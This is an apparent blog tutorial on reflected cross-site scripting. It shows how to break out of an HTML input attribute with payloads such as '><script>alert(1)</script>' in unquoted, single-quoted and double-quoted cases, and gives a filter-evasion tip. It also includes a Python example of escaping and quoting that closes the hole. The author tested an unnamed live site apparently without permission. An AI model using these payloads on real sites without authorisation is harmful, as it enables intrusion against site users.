Cross Site Scripting - Level 1 | Frozen Flame

Close it first; then exploit


Hello everyone. Welcome back to another tutorial on XSS, or Cross Site Scripting attacks. In my 1st tutorial, we talked about level 0, the beginner-level attack vectors. But you won't find that type in any bug bounty programme, or if you do, pretty rarely. That's why this time I will raise the level. Let's go for level 1. If you haven't read my 1st blog yet, I'd ask you to read that first and then come back to this one, or you may not understand what I am doing.

So, one day I was browsing a website at random, and I couldn't resist testing for XSS on that particular website. 😁 And luckily I found it there too. So I thought, why don't I share this with you? But, like the previous one, I won't share the domain or any other information about that website. Without further ado, let's exploit.

Exploitation ::

Our domain looked like everythingvuln1.com. And, like the previous one, I found a search box. I searched for a random string, something like,

testingxss

And I got a URL like,

everythingvuln1.com/search.php?query=testingxss

Checking the source code ::

Now I have to find out whether my randomly searched string appears in the client-side source code. After searching the source code, I found this,

<input type="text" name="query" value=testingxss>

OK. So the input tag's value attribute holds the searched query, and it is reflected without any quotes around it. As I see it, we have a chance to perform a successful Cross Site Scripting attack.

Choosing the correct payload ::

Bug bounty is like a war, and we have to choose the correct weapon to win it. Here, that means choosing the correct payload. Well, if I use the normal payload here, it won't work. Why? OK, let me show you the reason. If we search with the most common payload, like this,

<script>alert(1)</script>

Then the reflected source code will look like this, right?

<input type="text" name="query" value=<script>alert(1)</script>>


As you can see, it didn't execute, because the first part of our payload becomes the value of the attribute. So first we have to get out of the tag, and to do that we have to close the tag. Only then can our own tag execute. Every tag closes with a greater-than symbol ( > ). So our payload should,
  • Close the tag with the angle bracket ( > )
  • Then, execute the payload .
So, with our final payload, the source code will look like this,

<input type="text" name="query" value=><script>alert(1)</script>>

Many will ask, "What about the last angle bracket ( > )?" Actually, it can't do anything, and it won't stop our payload from executing in the webpage. But if you want, you may comment out the last angle bracket or end the payload like this: ><script>alert(1)</script>< . So our final payload is,

><script>alert(1)</script> or,

><script>alert(1)</script><

I searched for this payload in that particular website's search box, and it was what we expected: a successful Cross Site Scripting attack.

Some similar scenarios ::

Scene (1)

Source Code -
<input type="text" name="query" value='testingxss'>

Payload -
'><script>alert(1)</script>

Successful attack -
<input type="text" name="query" value=''><script>alert(1)</script>'>


Scene (2)

Source Code -
<input type="text" name="query" value="testingxss">

Payload -
"><script>alert(1)</script>

Successful attack -
<input type="text" name="query" value=""><script>alert(1)</script>">


Scene (3)

Source Code -
<input type="text" name="query" placeholder="testingxss">

Payload -
"><script>alert(1)</script>

Successful attack -
<input type="text" name="query" placeholder=""><script>alert(1)</script>">
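The defender's side of the three scenes above, as an added example that is not from the original post or the site it describes: a minimal Python stand-in for the page's search.php (the real PHP is not shown, so the renderer, its function names and the placement of the escaping are assumptions), once reflecting the query verbatim as the post describes and once with the attribute always double-quoted and HTML-encoded. A small html.parser check shows that the post's payloads produce an extra script tag in the vulnerable output, while the hardened output keeps the whole payload inside the value attribute as plain data.

```python
# Added example, not code from the original post or from the site it describes.
# Minimal server-side rendering of the search box from the post (the real page is
# search.php; this Python stand-in is an assumption), vulnerable vs. hardened, plus a
# parser check that shows whether a reflected value stays inside the value attribute.
import html
from html.parser import HTMLParser

# The post's payloads for the unquoted, single-quoted and double-quoted scenes
# (constructed copies; the placeholder scene behaves like the double-quoted one).
PAYLOADS = {
    "": "><script>alert(1)</script>",
    "'": "'><script>alert(1)</script>",
    '"': '"><script>alert(1)</script>',
}

def render_vulnerable(query, quote=""):
    """Reflect the query verbatim, as the post's page did.
    quote="" gives value=testingxss, quote="'" or '"' the quoted scenes."""
    return f'<input type="text" name="query" value={quote}{query}{quote}>'

def render_hardened(query):
    """Always double-quote the attribute and encode & < > " ' in the value,
    so no character of the query can end the attribute or the tag."""
    return f'<input type="text" name="query" value="{html.escape(query, quote=True)}">'

class TagCollector(HTMLParser):
    """Record every start tag and the decoded value attribute of the first <input>."""
    def __init__(self):
        super().__init__()
        self.tags = []
        self.value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input" and self.value is None:
            self.value = dict(attrs).get("value")

def parse(markup):
    """Return (start tags in document order, value attribute of the input)."""
    p = TagCollector()
    p.feed(markup)
    p.close()
    return p.tags, p.value

if __name__ == "__main__":
    for quote, payload in PAYLOADS.items():
        print("vulnerable", parse(render_vulnerable(payload, quote)))  # ['input', 'script'], ''
        print("hardened  ", parse(render_hardened(payload)))           # ['input'], payload intact
```

The same render_hardened pattern applies to the placeholder attribute of scene 3, and in real code it belongs in the template engine's attribute escaping rather than in hand-written string formatting.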

Note ::

Sometimes you may get blocked if you run it like this,
  • value=''><script>alert(1)</script> or,
  • value=""><script>alert(1)</script>
So try to put some value before you close the quote, single or double, so that there are some characters between the quotation marks. Then your query will be OK to go. 👻

That's all for today. If I get a good response from you, I will write more blogs about Cross Site Scripting attacks. Till then,
Happy Hacking. 💓💡